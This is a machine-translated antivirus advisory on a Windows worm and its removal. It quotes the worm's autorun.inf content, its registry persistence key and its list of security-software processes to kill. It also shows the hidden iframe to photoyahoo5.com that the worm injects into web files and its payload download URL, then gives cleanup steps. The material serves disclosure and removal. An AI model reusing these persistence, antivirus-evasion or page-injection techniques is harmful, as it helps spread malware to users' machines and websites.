Each partition root directory releases Shell.exe,autorun.inf virus cleanup method _ virus killing

Source: Internet
Author: User
Tags win32
Virus Name: Trojan-psw.win32.magania.os Kabbah
Worm.Win32.Delf.ysa Rising
File changes:
Releasing files
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

Each partition root is released
Shell.exe
Autorun.inf

Autorun.inf content
[Autorun]
Open=shell.exe
Shellexecute=shell.exe
Shell\auto\command=shell.exe

To modify the registry:
To create a startup project
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
is 0
Destroy display hidden files
Other actions

Stopping the Server service
Find software\\microsoft\\windows\\currentversion\\uninstall\\ Password anti-theft expert comprehensive registry entries
Delete it if found

Terminate the following process or close the window
Kvxp. Kxp
Kvmonxp.kxp
RavMon.exe
Ravmonclass
Tflockdownmain
ZoneAlarm
Zaframewnd
VirusScan
Symantec AntiVirus
Duba
Wrapped Gift Killer
IceSword
PJF (USTC)

Eghost. Exe
PasswordGuard.exe
Mailmon. Exe
Kavpfw. Exe
Iparmor. Exe
_avp32. Exe..
_AVPCC. Exe
_AVPM. EXEAVP32. Exe
AVPCC. Exe
AVPM. Exe
Avp. Exe
NAVAPW32. Exe
NAVW32. Exe
Nod32kui.exe
Nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
Vsmon.exe
Mcshield.exe
VsTskMgr.exe
NaPrdMgr.exe
UpdaterUI.exe
TBMon.exe
Scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
Kvxp.kxp
Kvmonxp.kxp
Kvcenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
Trojdie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

Traversing a partition that is not system-partitioned. ASP. exe. com. pif. exe. ASPX. COM. Htm. Html. Jsp. PHP files
Infection. Asp
. ASPX
. COM
. Htm
. Html
. Jsp
. Php
File
Add <iframe src=http://www.photoyahoo5.com width=0 to the back of the Height=0></iframe > 's Code

infection. exe. com. pif. exe
Adding 64516 bytes of content to its head belongs to the file head parasitic infection

Connect network download Hxxp://www.photoyahoo5.com/tools/01.exe to C packing directory

Purge method:
1. In Safe mode: (Reboot the system long press F8 until the prompt appears, then choose to enter Safe mode)

Copy the following code into Notepad and save as a 1.reg file
Windows Registry Editor Version 5.00
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"Regpath" = "software\\microsoft\\windows\\currentversion\\explorer\\advanced"
"Text" = "@shell32. dll,-30500"
"Type" = "Radio"
"CheckedValue" =dword:00000001
"ValueName" = "Hidden"
"DefaultValue" =dword:00000002
"Hkeyroot" =dword:80000001
"HelpID" = "shell.hlp#51105"



Double-click 1.reg to import this registry key

Double click on my Computer, tools, Folder Options, view, click to select "Show hidden files or folders" and clear the "Hide protected operating system files (recommended)" Front of the hook. When you are prompted to determine the changes, click Yes and then determine

and then delete
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic


And the Shell.exe under each partition.
Autorun.inf

2. Remove virus Startup Items (Start menu-run-enter "msconfig"-Start-delete items with Shell)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

3. Use anti-virus software to repair infected EXE files
4. Repair the modified Web page file
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.